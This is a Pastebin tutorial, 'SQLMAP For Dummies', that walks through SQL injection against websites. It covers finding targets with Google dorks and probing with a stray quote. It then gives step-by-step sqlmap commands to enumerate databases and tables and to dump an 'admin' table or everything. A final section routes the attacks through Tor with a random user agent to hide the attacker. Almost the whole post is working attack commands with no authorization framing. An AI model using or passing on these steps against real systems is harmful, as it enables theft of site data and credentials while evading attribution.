Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQLMAP For Dummies v1.0
- By Matrix
- http://www.twitter.com/TheAnonMatrix
- Required for use: Backtrack5 R1.
- Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
- Now lets get started!
- First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
- http://localhost.com/index.php?id=1337'
- Notice the ' here: ^
- This should give you a pretty error and a good start!
- Lets open sqlmap!
- So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
- python sqlmap.py -u <website>
- With a website we would simply do it like this
- python sqlmap.py -u http://localhost/index.php?id=1337
- (note we did not add the ' here)
- -u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
- (note the following options use double dashes)
- --dbs to find DataBases
- --users to find users.
- python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
- (for the sake of lenght we will be assuming you used --dbs in this tutorial)
- After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
- Should look like this:
- available databases [2]:
- [*] database1
- [*] database2
- Now to the fun part!
- python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
- This tells the program to find tables (--tables) in database (-D) names: database1.
- Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin!
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
- Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all.
- Examples:
- python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
- --dump dumps the selected tables content, --dump-all dumps EVERYTHING!
- But, we should be secure?
- Tor with SQLMAP:
- First find /etc/apt/sources.list open it and add
- deb http://deb.torproject.org/torproject.org lucid main
- Open the terminal and use this commandoes:
- gpg --keyserver keys.gnupg.net --recv 886DDD89
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
- And now we need more commandos ran as root:
- apt-get update apt-get install tor tor-geoipdb apt-get install polipo
- Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
- Go to /etc/polipoconfig and replce the file with the one above. restart polipo: /etc/init.d/polipo restart
- Congratz! now you can run sqlmap with TOR!
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
- Happy safe hacking!
- Source:
- http://www.coresec.org/2011/04/24/sqlmap-with-tor/
- https://www.torproject.org/docs/debian.html.en#ubuntu
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement